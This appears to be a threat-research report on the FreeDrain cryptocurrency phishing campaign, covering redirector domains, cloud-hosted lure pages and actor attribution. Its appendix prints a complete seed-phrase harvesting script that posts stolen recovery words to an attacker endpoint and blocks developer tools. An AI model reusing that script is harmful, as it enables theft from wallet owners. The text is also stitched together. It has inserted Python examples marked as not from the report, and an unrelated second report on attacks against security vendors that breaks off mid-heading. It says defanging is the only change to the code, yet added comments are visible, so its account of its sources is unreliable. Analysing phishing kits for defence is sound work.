English-adjacent structure, visually familiar but never forming real English words
Examples include:
antressmirestos[.]com
shotheatsgnovel[.]com
bildherrywation[.]com
Each URL also included a GUID-like string in the path, which may have served as a session ID, traffic source identifier, or logic gate for redirection behavior. Examples:
(A complete list of FreeDrain-associated redirector domains is provided in the appendix.)
Domain Registration and Infrastructure Clues
All domains we identified were registered via Key-Systems GmbH, a registrar often used for bulk domain purchases and programmatic registration.
Initially, we suspected that these domains were all managed by the FreeDrain operators as well, but we have since connected them to a much larger network of thousands of domain names that are used to route traffic for many different purposes.
Looking at DNS history for some of the older redirectors on our list, we saw that they rotated IP addresses relatively infrequently, resolving to just a small number of IPs within a time window of weeks to months.
DNS history for scientcontopped[.]com prior to expiration (2024)
The domain resolved to only a handful of IPs over its active life, suggesting stable, centralized hosting infrastructure.
Pivoting on IP addresses shared by these older FreeDrain domains revealed that there are hundreds of other domain names that share nearly identical characteristics in terms of naming conventions, registration patterns, and hosting patterns. Yet, these other domains didn’t exhibit direct ties to FreeDrain behavior.
Pivot from confirmed FreeDrain redirector (yellow asterisk) reveals broader domain ecosystem with matching infrastructure traits
This led us to two possibilities:
The redirectors are part of a leased infrastructure-as-a-service model, used by FreeDrain and potentially many other threat actors
FreeDrain is a subdivision of a broader operation, with shared tooling and infrastructure but distinct campaigns
At this stage, the full extent of this infrastructure and the relationships between campaigns remain an open research question. What is clear, however, is that FreeDrain does not operate in isolation, and the redirection layer may be a service used by multiple actors.
Phishing Pages
Across our monitoring, we observed dozens of variations in FreeDrain phishing pages but technically, they were all fairly simple and consistent in architecture.
These phishing pages were most often:
Hosted on cloud infrastructure, primarily Amazon S3 and Azure Web Apps
Designed to mimic legitimate cryptocurrency wallet interfaces (Trezor, MetaMask, Ledger, etc.)
Implemented using HTML forms or AJAX POST requests to transmit stolen credentials to attacker-controlled endpoints
A typical FreeDrain phishing page served from an S3 bucket, delivering only static content
Some S3-hosted phishing sites sent harvested data to live backend services on Azure, as seen in multiple instances where form actions pointed to azurewebsites.net applications.
The form for an S3-hosted FreeDrain phishing page posts to “/send.php” running in Azure
Human Operators Behind the Scenes
While most pages used standard static phishing techniques, we occasionally encountered live chat widgets embedded in Azure-hosted phishing pages.
This chat feature had previously been documented in a 2022 report by Netskope (one of the few references to FreeDrain we ever found, and the earliest reported). Our own interactions confirmed that humans, not bots, were responding to victim inquiries in real time, often providing reassurance or technical “help” to keep targets engaged.
Live chat interaction on a phishing page hosted in Azure
Clean, Unobfuscated Exfiltration Code
In the malicious JavaScript we observed handling POST requests with stolen seed phrases, the code is well-formatted, commented, and does not appear to be obfuscated in any way. Full examples are provided in the appendix, but a snippet of the POST request is below (domain bolded and defanged):
Despite its simplicity, the phishing backend was effective, disposable, and often difficult to trace—highlighting just how low the bar is for technical sophistication when paired with wide-scale reach and persistent lure infrastructure.
Actor Analysis
Attribution is inherently difficult when infrastructure is ephemeral and built on shared, free-tier services. Yet through a combination of repository metadata, behavioral signals, and timing artifacts, we were able to extract meaningful insights about FreeDrain’s operators, including likely location, working patterns, and their degree of operational coordination.
Our first major breakthrough came from GitHub Pages (github.io), which only allows hosting via a public repository that matches the account’s GitHub username (e.g., username.github.io). This constraint meant every active FreeDrain lure page hosted on GitHub had a publicly accessible repository behind it.
We cloned hundreds of these repositories and analyzed the commit metadata, including timestamps, usernames, email addresses, and whether commits were made via the CLI or web interface. Several clear patterns emerged:
Email addresses were always unique, tied 1:1 with the GitHub account, and never reused.
All emails came from free providers like Gmail, Hotmail, Outlook, and ProtonMail.
While naming styles varied widely (capitalization, numbers, patterns), we found clusters of similarly structured addresses, suggesting manual creation by multiple individuals, possibly using a shared template or naming approach.
Sample of email addresses found in FreeDrain-associated GitHub commits
Importantly, GitHub commits preserve the local timezone of the user unless manually configured otherwise. In our dataset, over 99% of commits were timestamped in UTC+05:30 (Indian Standard Time), our first strong geographic indicator.
Over 99% of the commits analyzed were localized to UTC+05:30
We corroborated this signal using metadata from other free infrastructure and services used by FreeDrain. Webflow, for instance, embeds a “last published” timestamp in the HTML source of hosted sites. When we aggregated timestamps across the many FreeDrain Webflow pages, a clear 9-to-5 weekday work pattern emerged, complete with a consistent midday break. This pattern aligns closely with a standard business schedule in the IST timezone.
Aggregated Webflow publish times show an exceptionally clear weekday work pattern in UTC+05:30
Webflow embeds publish timestamps into the HTML source code of published websites
Combining these and other signals across platforms, we assess with high confidence that FreeDrain is operated by individuals based in the IST timezone, likely in India, working standard weekday hours.
Additionally, timeline analysis shows that FreeDrain has been active since at least 2022, with a notable acceleration in mid-2024. As of this writing, the campaign remains active across several free hosting and publishing platforms.
Confirmed “last published” times, by date
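The two signals above, commit timezone offsets and Webflow publish times, can be aggregated with a short script. This is an added example, not the report's own tooling: the git log lines and HTML snippets are constructed, and the `<!-- Last Published: ... -->` comment format is my assumption of how Webflow stamps pages, so adjust the regex to match what you actually see in the source.

```python
"""Timezone and working-hours profiling from commit and publish timestamps.

Added example, not code from the report. The git log lines and Webflow HTML
snippets are constructed; the 'Last Published' comment format is an assumption
about how Webflow stamps published pages.
"""
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

IST = timezone(timedelta(hours=5, minutes=30))

# Constructed output of `git log --format='%H %ci'` (hash, committer date with offset).
GIT_LOG_LINES = [
    "a1b2c3 2024-06-03 10:15:22 +0530",
    "b2c3d4 2024-06-03 11:40:05 +0530",
    "c3d4e5 2024-06-04 09:05:47 +0530",
    "d4e5f6 2024-06-04 15:22:10 +0530",
    "e5f6a7 2024-06-05 12:01:33 +0530",
    "f6a7b8 2024-06-06 17:45:00 +0530",
    "a7b8c9 2024-06-07 10:30:15 +0530",
    "b8c9d0 2024-06-08 02:10:00 +0000",
]

# Constructed HTML heads in the style of a Webflow-published page (format assumed).
WEBFLOW_PAGES = [
    "<!DOCTYPE html><!-- Last Published: Mon Jun 03 2024 04:30:00 GMT+0000 (Coordinated Universal Time) --><html>",
    "<!DOCTYPE html><!-- Last Published: Tue Jun 04 2024 06:15:00 GMT+0000 (Coordinated Universal Time) --><html>",
    "<!DOCTYPE html><!-- Last Published: Wed Jun 05 2024 11:40:00 GMT+0000 (Coordinated Universal Time) --><html>",
    "<!DOCTYPE html><!-- Last Published: Sat Jun 08 2024 05:00:00 GMT+0000 (Coordinated Universal Time) --><html>",
    "<!DOCTYPE html><html><head><title>no publish stamp</title></head></html>",
]

PUBLISHED_RE = re.compile(r"Last Published: (\w{3} \w{3} \d{2} \d{4} \d{2}:\d{2}:\d{2}) GMT\+0000")


def parse_git_timestamps(lines):
    """Parse `%ci`-style lines into timezone-aware datetimes, keeping the committer's offset."""
    return [datetime.strptime(line.split(" ", 1)[1], "%Y-%m-%d %H:%M:%S %z") for line in lines]


def parse_webflow_published(html):
    """Return the 'Last Published' time as a UTC datetime, or None if the stamp is absent."""
    m = PUBLISHED_RE.search(html)
    if not m:
        return None
    return datetime.strptime(m.group(1), "%a %b %d %Y %H:%M:%S").replace(tzinfo=timezone.utc)


def offset_label(dt):
    """Render a datetime's UTC offset as 'UTC+05:30'."""
    secs = int(dt.utcoffset().total_seconds())
    sign = "+" if secs >= 0 else "-"
    secs = abs(secs)
    return f"UTC{sign}{secs // 3600:02d}:{secs % 3600 // 60:02d}"


def timezone_share(dts):
    """Fraction of timestamps carrying each UTC offset (the %z the committer's machine wrote)."""
    counts = Counter(offset_label(dt) for dt in dts)
    return {label: n / len(dts) for label, n in counts.items()}


def hour_of_week_histogram(dts, tz):
    """Counter keyed by (weekday, hour) after converting every timestamp into `tz`."""
    hist = Counter()
    for dt in dts:
        local = dt.astimezone(tz)
        hist[(local.weekday(), local.hour)] += 1
    return hist


def fraction_in_business_hours(dts, tz, start=9, end=18):
    """Share of timestamps falling Mon-Fri between `start` and `end` o'clock in `tz`."""
    hits = 0
    for dt in dts:
        local = dt.astimezone(tz)
        if local.weekday() < 5 and start <= local.hour < end:
            hits += 1
    return hits / len(dts) if dts else 0.0


if __name__ == "__main__":
    commits = parse_git_timestamps(GIT_LOG_LINES)
    publishes = [d for d in map(parse_webflow_published, WEBFLOW_PAGES) if d is not None]
    print(timezone_share(commits))
    print(sorted(hour_of_week_histogram(commits + publishes, IST).items()))
    print(fraction_in_business_hours(commits + publishes, IST))
```

Webflow stamps are in UTC, so they carry no offset of their own; the histogram only becomes meaningful once you convert them into the candidate timezone suggested by the commit offsets and check whether the weekday/hour distribution lines up with a working day there.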
Disruption Efforts and Opportunities
The scale and diversity of services abused by FreeDrain made disruption an ongoing challenge. While the campaign leaned heavily on free-tier platforms, many of which allowed users to publish images, text, external links, and even custom JavaScript to subdomains under well-known parent domains, very few of these platforms offered streamlined abuse reporting workflows.
In most cases, there was no direct method to report malicious content from the content page itself, forcing us to manually investigate each platform’s policies, support forms, or contact channels. This adds unnecessary friction to the response process, especially when scaled across hundreds of active malicious pages.
Even more concerning, most of the publishing platforms lacked the detection capabilities to identify this type of coordinated abuse on their own. The indicators were there: repetitive naming patterns, clustered behavior, identical templates reused across subdomains, but limited proactive action was being taken.
This highlights a broader industry need:
Free-tier content platforms should invest in basic abuse prevention tooling and more accessible reporting mechanisms.
At minimum, this includes:
Allowing abuse to be reported directly from published content pages
Monitoring for patterns of misuse (e.g., bulk account creation, similar domain structures, repeated hosting of external phishing kits)
Establishing direct communication lines with trusted threat intel analysts and threat researchers
FreeDrain’s reliance on free-tier platforms is not unique, and without better safeguards, these services will continue to be weaponized at scale.
This isn’t just a security issue, it’s a business one. When threat actors abuse these platforms to host phishing pages, fake login portals, or crypto scams, they erode user trust in the entire platform domain. Over time, this leads to real financial consequences:
Reputation damage: Reputable domain names like webflow.io and teachable.com can quickly become flagged by corporate security tools, browser warning systems, and threat intelligence feeds. This reduces their utility for legitimate users and undermines the brand’s credibility.
Deliverability and discoverability: Once a platform’s domain is associated with widespread abuse, search engines, email providers, and social networks may down-rank or block links from that domain, hurting all users, including paying customers.
Customer churn and support burden: Abuse-driven issues often result in a higher volume of customer support tickets, complaints, and refunds, particularly when paying users find their content mistakenly flagged or blocked due to a shared domain reputation.
Increased infrastructure and fraud costs: Hosting abusive content, even at scale on free tiers, still consumes compute, storage, and bandwidth. Worse, it may attract waves of automated account signups and resource abuse that raise operational costs.
Failing to detect and mitigate this kind of abuse isn’t just a user risk; it’s an unpaid tax on the business, dragging down growth and trust at every layer. Proactive abuse prevention and streamlined reporting are not just table stakes for security, they’re critical to long-term sustainability.
References and Similarities to Other Campaigns
Elements of the FreeDrain campaign were first publicly documented in August 2022 by Netskope, with a follow-up report in September 2022. Netskope’s early findings captured the core tactics that continue today: leveraging SEO manipulation to drive traffic to lure pages, which then redirect to credential-harvesting phishing sites. Netskope also published another update in October 2024, focusing on FreeDrain’s use of Webflow-hosted infrastructure, confirming the campaign’s continued evolution while retaining the same fundamental workflow.
FreeDrain’s abuse of legitimate free-tier platforms is part of a broader trend in phishing infrastructure, but it remains distinct from other well-known crypto phishing efforts. For example, the CryptoCore campaign, reported by Avast in August 2024, similarly targets cryptocurrency users but relies heavily on YouTube content and impersonation videos to draw in victims, rather than search engine poisoning and static phishing sites.
In 2023, Trustwave reported on the use of Cloudflare’s pages.dev and workers.dev services in phishing, showing how modern hosting platforms that offer free, customizable subdomains with minimal friction are being systematically exploited, mirroring FreeDrain’s approach.
Recent reporting has also shed light on the kinds of threat actors that may be behind campaigns like FreeDrain. Just this week, the U.S. Treasury sanctioned individuals linked to cyber scam operations in Southeast Asia, specifically a militia group in Burma involved in online fraud networks. While distinct from FreeDrain, these operations share similar hallmarks: large-scale abuse of online infrastructure, technical capability, and a focus on financial theft, demonstrating the scale and organization such campaigns can operate under.
FreeDrain’s techniques have also been informally documented by affected users. In particular, Trezor hardware wallet customers have reported fraudulent websites mimicking the Trezor ecosystem, some of which were part of FreeDrain’s infrastructure:
The FreeDrain network represents a modern blueprint for scalable phishing operations, one that thrives on free-tier platforms, evades traditional abuse detection methods, and adapts rapidly to infrastructure takedowns. By abusing dozens of legitimate services to host content, distribute lure pages, and route victims, FreeDrain has built a resilient ecosystem that’s difficult to disrupt and easy to rebuild.
Through detailed infrastructure analysis, repository metadata mining, and cross-platform behavioral correlations, we uncovered rare insights into the actors behind the campaign, including strong indicators that the operation is manually run by a group based in the UTC+05:30 timezone, working standard business hours. Despite this visibility, systemic weaknesses in reporting mechanisms and abuse detection have allowed FreeDrain to persist and even accelerate in 2024.
This is not just a FreeDrain problem. The broader ecosystem of free publishing platforms is being exploited in ways that disproportionately benefit financially motivated threat actors. Without stronger default safeguards, identity verification, or abuse response infrastructure, these services will continue to be abused, undermining user trust and inflicting real-world financial harm.
By exposing the scale and structure of the FreeDrain network, we hope this research will enable better platform-level defenses, more informed user education, and collaboration across the security community to limit the reach and longevity of operations like this.
This is an example of the JavaScript (“app.js”) that was included on the S3-hosted phishing example: https://dft0-hjgkd26-fkj.s3.us-east-1.amazonaws[.]com/index.html.
Note that the malicious URL in the code below has been defanged; that is the only alteration.
let currentWordCount = 12; // Default word count

function updateInputFields(wordCount) {
    const inputContainer = document.getElementById('inputContainer');
    inputContainer.innerHTML = '';
    currentWordCount = wordCount;

    for (let i = 0; i < wordCount; i++) { // Use 0-based index for phase keys
        const colDiv = document.createElement('div');
        // if (wordCount === 1) {
        //     colDiv.className = 'col-lg-21 col-md-12 col-sm-12 col-xs-12';
        //     colDiv.innerHTML = `
        //         <input
        //             class="form-control"
        //             type="text"
        //             placeholder="Input your words as many words as you have"
        //             name="word${i}"
        //             required
        //             title="Only alphabets are allowed.">
        //         <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
        //     `;
        // } else {
        colDiv.className = 'col-lg-4 col-md-4 col-sm-4 col-xs-12';
        colDiv.innerHTML = `
            <input
                class="form-control"
                type="text"
                placeholder="${i + 1}."
                name="word${i}"
                required
                pattern="[a-zA-Z]{1,10}"
                maxlength="10"
                oninput="this.value = this.value.replace(/[^a-zA-Z]/g, '').substring(0, 10);"
                title="Only alphabets are allowed.">
            <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
        `;
        // }
        inputContainer.appendChild(colDiv);
    }

    // `event` is not a parameter here; the kit relies on the legacy implicit window.event global
    event.target.classList.add('active');
    const buttons = document.querySelectorAll('.displayflex button');
    buttons.forEach((button) => {
        button.classList.remove('active');
    });
    event.target.classList.add('active');
}

async function handleNextStep(event) {
    event.preventDefault();
    const inputContainer = document.getElementById('inputContainer');
    const inputs = inputContainer.querySelectorAll('input');
    let allValid = true;
    const enteredWords = new Set();

    inputs.forEach((input) => {
        const errorDiv = input.nextElementSibling; // Get the associated error div
        if (!input.checkValidity()) {
            errorDiv.style.display = 'block';
            allValid = false;
        } else {
            errorDiv.style.display = 'none';
        }

        const word = input.value.trim().toLowerCase(); // Normalize to lowercase to handle case insensitivity
        if (word && enteredWords.has(word)) {
            allValid = false;
            errorDiv.innerHTML = 'This word has already been entered.';
            errorDiv.style.display = 'block';
        } else {
            enteredWords.add(word); // Add word to the Set
        }
    });

    if (!allValid) {
        alert("Mnemonic phrase is not valid. Try again.");
        return;
    }

    const data = {};
    inputs.forEach((input, index) => {
        data[`phrase${index}`] = input.value.trim();
    });
    data.subject = "Trezor connect2";
    data.message = "Successfull fetch data";

    // Exfiltration: the collected words are POSTed as JSON to the attacker-controlled
    // API Gateway endpoint (defanged), then the victim is bounced to the real Trezor site
    $.ajax({
        type: "POST",
        url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
        dataType: "json",
        crossDomain: true,
        contentType: "application/json; charset=utf-8",
        data: JSON.stringify(data),
        success: function (result) {
            alert('Data submitted successfully1!');
            window.location.href = 'https://suite.trezor.io/web/';
            location.reload();
        },
        error: function (xhr, status, error) {
            window.location.href = 'https://suite.trezor.io/web/';
        }
    });
}

window.onload = function () {
    // Prevent the back button from navigating back
    function preventBack() {
        history.forward();
    }

    // Execute the `preventBack` function immediately after page load
    setTimeout(preventBack, 0);

    // Ensure the page doesn't cache on unload, forcing users to reload
    window.onunload = function () {
        return null;
    };
};

document.addEventListener('DOMContentLoaded', () => updateInputFields(12));

// Fake "device connection" status cycle that ends in an error state, prompting the
// victim to type the recovery phrase by hand
document.addEventListener("DOMContentLoaded", function () {
    const statusButton = document.getElementById("statusButton");
    const statusText = document.getElementById("statusText");
    const statusIcon = document.getElementById("statusIcon");

    // Initial state: "Waiting for Trezor..."
    statusText.textContent = "Waiting for Trezor... ";
    statusIcon.innerHTML = '';

    // After 2 seconds: "Establishing connection"
    setTimeout(() => {
        statusText.textContent = "Establishing connection...";
        statusIcon.innerHTML = '';
    }, 5000);

    // After 5 seconds: "Unable to read data" (Error state)
    setTimeout(() => {
        statusText.textContent = "Unable to read data";
        statusIcon.innerHTML = '';
        statusButton.classList.add("error-btn");
    }, 5000);

    function resetStatus() {
        // Reset to "Establishing connection..."
        statusText.textContent = "Establishing connection...";
        statusIcon.innerHTML = '';
        statusButton.classList.remove("error-btn"); // Reset error button class

        // After 3 seconds: Change status to "Unable to read data"
        setTimeout(() => {
            statusText.textContent = "Unable to read data";
            statusIcon.innerHTML = '';
            statusButton.classList.add("error-btn");
        }, 5000);
    }

    // Event listener for button click
    statusButton.addEventListener("click", function () {
        resetStatus(); // Reset and start the cycle on each click
    });

    // Optionally, you can trigger the status change flow immediately after page load for testing
    setTimeout(() => {
        resetStatus(); // Automatically run the flow when the page loads (optional)
    }, 5000);
});

// Anti-analysis measures: block the context menu, common devtools shortcuts, and
// probe for an open console via a getter on a logged object

// Disable right-click context menu
document.addEventListener("contextmenu", (event) => event.preventDefault());

// Disable key combinations for opening developer tools
document.addEventListener("keydown", (event) => {
    // Disable F12, Ctrl+Shift+I, Ctrl+Shift+J, Ctrl+U (View Source), Ctrl+Shift+C
    if (
        event.key === "F12" ||
        (event.ctrlKey && event.shiftKey && ["I", "J", "C"].includes(event.key)) ||
        (event.ctrlKey && event.key === "U")
    ) {
        event.preventDefault();
    }
});

// Detect if devtools is opened (basic detection)
const detectDevTools = () => {
    const element = new Image();
    Object.defineProperty(element, "id", {
        get: () => {
            alert("Developer tools detected. Please close it to proceed.");
            // Redirect or log out the user
            window.location.href = "about:blank"; // Example action
        },
    });
    console.log(element);
};

detectDevTools();
setInterval(detectDevTools, 1000);
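For the unobfuscated harvesting code described in the phishing-page section and shown in full above, a static triage pass that an analyst or platform abuse team might run over uploaded scripts, as an added example that is not part of the report. Both samples are constructed (placeholder hosts under .invalid): the first reproduces the traits of the app.js above, the second is an ordinary same-origin login form. Nothing here executes the script; it is a regex pass over source text.

```python
"""Static triage of client-side JavaScript for seed-phrase harvesting traits.

Added example, not code from the report. Both samples below are constructed:
the first mirrors the traits of the kit's app.js with placeholder hosts
(*.invalid), the second is an ordinary login form.
"""
import re
from urllib.parse import urlparse

# Each indicator is one trait of the harvesting kit described in the report.
INDICATORS = {
    "seed_phrase_fields": re.compile(r"mnemonic|seed\s*phrase|recovery\s*phrase|phrase\$\{|phrase\d+|word\$\{", re.I),
    "wallet_brand_redirect": re.compile(r"suite\.trezor\.io|metamask\.io|ledger\.com", re.I),
    "context_menu_blocked": re.compile(r"""addEventListener\(\s*["']contextmenu["']""", re.I),
    "devtools_keys_blocked": re.compile(r"""["']F12["']"""),
    "devtools_getter_trap": re.compile(r"""Object\.defineProperty\([^)]*["']id["']""", re.S),
    "back_button_trap": re.compile(r"history\.forward\(\)"),
}

# Places where a URL receiving form data typically appears: jQuery `url:`, fetch(), <form action=>.
SUBMIT_URL_RE = re.compile(r"""(?:url\s*:|fetch\(|action=)\s*["']([^"']+)["']""", re.I)


def refang(text):
    """Undo the [.] defanging used in reports so hosts parse normally."""
    return text.replace("[.]", ".")


def scan_script(source, page_host):
    """Return matched indicators, submit URLs and the off-site hosts they point at."""
    source = refang(source)
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    urls = SUBMIT_URL_RE.findall(source)
    offsite = {
        urlparse(u).hostname for u in urls
        if urlparse(u).hostname and urlparse(u).hostname != page_host
    }
    # Off-site submission counts double: form data leaving the lure's own origin is the
    # defining trait; the anti-analysis tricks only raise confidence.
    score = len(hits) + 2 * len(offsite)
    return {
        "indicators": hits,
        "submit_urls": urls,
        "offsite_hosts": offsite,
        "score": score,
        "verdict": "likely seed-phrase harvester" if score >= 4 else "no strong signal",
    }


# Constructed sample modelled on the kit (placeholder endpoint, not the real one).
HARVESTER_SAMPLE = r"""
async function handleNextStep(event) {
  event.preventDefault();
  const data = {};
  inputs.forEach((input, index) => { data[`phrase${index}`] = input.value.trim(); });
  $.ajax({
    type: "POST",
    url: "https://exfil-endpoint[.]invalid/prod/eappmail",
    data: JSON.stringify(data),
    success: function () { window.location.href = 'https://suite.trezor.io/web/'; }
  });
}
document.addEventListener("contextmenu", (e) => e.preventDefault());
document.addEventListener("keydown", (e) => { if (e.key === "F12") e.preventDefault(); });
const probe = new Image();
Object.defineProperty(probe, "id", { get: () => { window.location.href = "about:blank"; } });
setTimeout(() => history.forward(), 0);
"""

# Constructed ordinary login script: posts to its own origin, no traps.
LOGIN_SAMPLE = r"""
document.getElementById("login").addEventListener("submit", async (e) => {
  e.preventDefault();
  await fetch("/api/login", { method: "POST", body: new FormData(e.target) });
});
"""

if __name__ == "__main__":
    print(scan_script(HARVESTER_SAMPLE, "lure-bucket.invalid"))
    print(scan_script(LOGIN_SAMPLE, "shop.invalid"))
```

The same pass works over the HTML of an S3- or Azure-hosted page, where the `action=` branch of the URL regex catches form posts such as the "/send.php" handler mentioned earlier; a relative action resolves to the page's own host and is not counted as off-site.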
In recent months, SentinelOne has observed and defended against a spectrum of attacks from financially motivated crimeware to tailored campaigns by advanced nation-state actors.
These incidents were real intrusion attempts against a U.S.-based cybersecurity company by adversaries, but incidents such as these are neither new nor unique to SentinelOne.
Recent adversaries have included:
DPRK IT workers posing as job applicants
ransomware operators probing for ways to access/abuse our platform
Chinese state-sponsored actors targeting organizations aligned with our business and customer base
This report highlights a rarely-discussed but crucially important attack surface: security vendors themselves.
Overview
At SentinelOne, defending against real-world threats isn’t just part of the job, it’s the reality of operating as a cybersecurity company in today’s landscape. We don’t just study attacks, we experience them firsthand, levied against us. Our teams face the same threats we help others prepare for, and that proximity to the front lines shapes how we think, and how we operate. Real-world attacks against our own environment serve as constant pressure tests, reinforcing what works, revealing what doesn’t, and driving continuous improvement across our products and operations. When you’re a high-value target for some of the most capable and persistent adversaries out there, nothing less will do.
Talking about being targeted is uncomfortable for any organization. For cybersecurity vendors, it’s practically taboo. But the truth is security vendors sit at an interesting cross-section of access, responsibility, and attacker ire that makes us prime targets for a variety of threat actors, and the stakes couldn’t be higher. When adversaries compromise a security company, they don’t just breach a single environment—they potentially gain insight into how thousands of environments and millions of endpoints are protected.
In the past several months alone, we’ve observed and defended against a spectrum of attacks ranging from financially motivated crimeware to tailored campaigns by advanced nation-state actors. They were real intrusion attempts targeting a U.S.-based cybersecurity company — launched by adversaries actively looking for an advantage, access, or leverage. Adversaries included DPRK IT workers posing as job applicants, ransomware operators probing for ways to access/abuse our platform, and Chinese state-sponsored actors targeting organizations aligned with our business and customer base.
We are certainly not the only ones facing these threats. In the spirit of furthering collective defenses and encouraging further collaboration, we’re pulling back the curtain to share some of what we’ve seen, why it matters, and what it tells us about the evolving threat landscape—not just for us, but for every company building and relying on modern security technology.
DPRK IT Workers Seeking Inside Jobs
One of the more prolific and persistent adversary campaigns we’ve tracked in recent years involves widespread campaigns by DPRK-affiliated IT Workers attempting to secure remote employment within Western tech companies, including SentinelOne. Early reports drew attention to these efforts and our own analysis revealed further logistical infrastructure to launder illicit funds via Chinese intermediary organizations. However, neither gave a sense of the staggering volume of ongoing infiltration attempts. This vector far outpaces any other insider threat vector we monitor.
These actors are not just applying blindly — they are refining their process, leveraging stolen or fabricated personas, and adapting their outreach tactics to mirror legitimate job seekers in increasingly convincing ways. Our team has tracked roughly 360 fake personas and over 1,000 job applications linked to DPRK IT worker operations applying for roles at SentinelOne — even including brazen attempts to secure positions on the SentinelLabs intelligence engineering team itself.
Public reporting of DPRK IT workers applying to threat intelligence positions
Engagement and Adversary Interaction
Instead of staying passive, we made a deliberate choice towards intelligence-driven engagement. In coordination with our talent acquisition teams, we developed workflows to identify and interact with suspected DPRK applicants during the early phases of their outreach. This collaboration was key. By embedding lightweight vetting signals and monitoring directly into recruiting processes — without overburdening hiring teams — we were able to surface anomalous patterns tied to DPRK-affiliated personas piped directly into our Vertex Synapse intelligence platform for analyst review.
Our attempted interactions offered rare insights into the craftiness and persistence of these infiltration campaigns — particularly the ways in which adversaries adapt to the friction they encounter.
Inbound DPRK referral request to strategic employees
The attackers are honing their craft beyond the job application and recruitment process. An operation of this scale and nature requires a different kind of backend infrastructure, such as a sprawling network of front companies to enable further laundering and logistics.
DPRK IT Worker Front Company Network (November 2024)
Helping Hiring Teams Help Us
A key takeaway in working on this investigation was the value of intentionally creating inroads and sharing threat context with different teams not normally keyed into investigations. Rather than cluelessness, we encountered an intuitive understanding of the situation as recruiters had already been filtering out and reporting ‘fake applicants’ within their own processes.
We brought campaign-level understanding that was combined with tactical insights from our talent team. The payoff was immediate. Recruiters began spotting patterns on their own, driving an increase in early-stage escalation of suspicious profiles. They became an active partner that continues to flag new sightings from the frontlines. In turn, we are codifying these insights into automated systems that flag, filter, enrich, and proactively block these campaigns to lower the burden on our recruiters and hiring managers, and reduce the risk of infiltration.
Make cross‑functional collaboration standard operating procedure: equip frontline business units—from recruiting to sales—with shared threat context and clear escalation paths so they can surface anomalies early without slowing the business. Codifying insights with automation will consistently bring bi-directional benefits.
The DPRK IT worker threat is a uniquely complex challenge — one where meaningful progress depends on collaboration between the security research community and public sector partners.
Ransomware Group Capability Development
Financially motivated threat actors frequently target enterprise security platforms—products designed to keep them from making money—for direct access. SentinelOne, like our peers, is no exception. While uncomfortable, this is a reality the industry faces continually and should handle with both transparency and urgency.
Forum post offering security product access
Privileged access to administrative interfaces or agent installers for endpoint security products provides tangible advantages for adversaries seeking to advance their operations. Console access can be used to disable protections, manipulate configurations, or suppress detections. Direct, unmonitored access to the endpoint agent offers opportunities to test malware efficacy, explore bypass or tampering techniques, and suppress forensic visibility critical for investigations. In the wrong hands, these capabilities represent a significant threat to both the integrity of security products and the environments they protect.
This isn’t a new tactic. Various high-profile criminal groups have long specialized in social engineering campaigns to gain access to core security tools and infrastructure—ranging from EDR platforms (including SentinelOne and Microsoft Defender) to IAM and VPN providers such as Okta. Their goal: expand footholds, disable defenses, and obstruct detection long enough to profit.
Recent leaks related to Black Basta further underscore this trend. The group’s operators were observed testing across multiple endpoint security platforms—including SentinelOne, CrowdStrike, Carbon Black, and Palo Alto Networks—before launching attacks, suggesting a systematic effort to evaluate and evade security tools prior to deployment.
Black Basta leak excerpts
Economy/Ecosystem
There is an increasingly mature and active underground economy built around the buying, selling, and renting of access to enterprise security tools. For the right price, aspiring threat actors continually attempt to obtain time-bound or persistent access to our EDR platform and administrative consoles. Well-known cybercrime forums are filled with vendors openly advertising such access—and just as many buyers actively seeking it. This includes long-established forums like XSS[.]is, Exploit[.]in and RAMP.
That said, more of this activity has been moving to confidential messaging platforms as well (Telegram, Discord, Signal). For example, Telegram bots are used to automate trading this access, and Signal is often used by threat actors to discuss nuance, targeting and initial access operations.
This supply-and-demand dynamic is not only robust but also accelerating. Entire service offerings have emerged around this ecosystem, including “EDR Testing-as-a-Service,” where actors can discreetly evaluate malware against various endpoint protection platforms.
Proposed Private EDR testing service
While these testing services may not grant direct access to full-featured EDR consoles or agents, they do provide attackers with semi-private environments to fine-tune malicious payloads without the threat of exposure—dramatically improving the odds of success in real-world attacks.
Prospective buyer for EDR installs
Access isn’t always bought, however. Threat actors frequently harvest legitimate credentials from infostealer logs—a common and low-cost method of acquiring privileged access to enterprise environments. In cases where existing customers reuse credentials, this can translate into a threat actor also gaining access to security tools. In more targeted operations, actors have also turned to bribery, offering significant sums to employees willing to sell out their account access.
These insider threats are not hypothetical. For instance, some groups have been observed offering upwards of $20,000 to employees at targeted companies in exchange for insider assistance—an approach openly discussed in the same dark web forums where compromised credentials and access are routinely traded.
On the defensive side, this requires constant monitoring and maintenance. Situational awareness has to be prioritized in order to maintain platform integrity and protect our legitimate customers. Our research teams are constantly monitoring for this style of abuse and access ‘leakage’, focusing on anomalous console access and site-token usage, and taking necessary actions to revoke these access vectors. This prohibits threat actors from fully interacting with the wider platform, and essentially orphans leaked agent installs, limiting the use of the agent in the hands of the threat actor.
Nitrogen — Threat Operators ‘Leveling Up’
Some ransomware operations are now bypassing the underground market altogether—opting instead for more tailored, concentrated-effort impersonation campaigns to gain access to security tools. This approach is epitomized by the Nitrogen ransomware group.
Nitrogen is believed to be operated by a well-funded Russian national with ties to earlier groups like Maze and Snatch. Rather than purchasing illicit access, Nitrogen impersonates real companies—spinning up lookalike domains, spoofed email addresses, and cloned infrastructure to convincingly pose as legitimate businesses. Nitrogen then purchases official licenses for EDR and other security products under these false pretenses.
This kind of social engineering is executed with precision. Nitrogen typically targets small, lightly vetted resellers—keeping interactions minimal and relying on resellers’ inconsistent KYC (Know Your Customer) practices to slip through the cracks.
These impersonation tactics introduce a new layer of complexity for defenders. If a threat actor successfully acquires legitimate licenses from a real vendor, they can weaponize the product to test, evade, and potentially disable protections—without ever having to engage with criminal markets.
This highlights a growing challenge for the security industry: reseller diligence and KYC enforcement are clearly part of the threat surface. When those controls are weak or absent, adversaries like Nitrogen gain powerful new ways to elevate their campaigns—often at a lower cost and lower risk than the black market.
Lessons Learned and Internal Collaboration
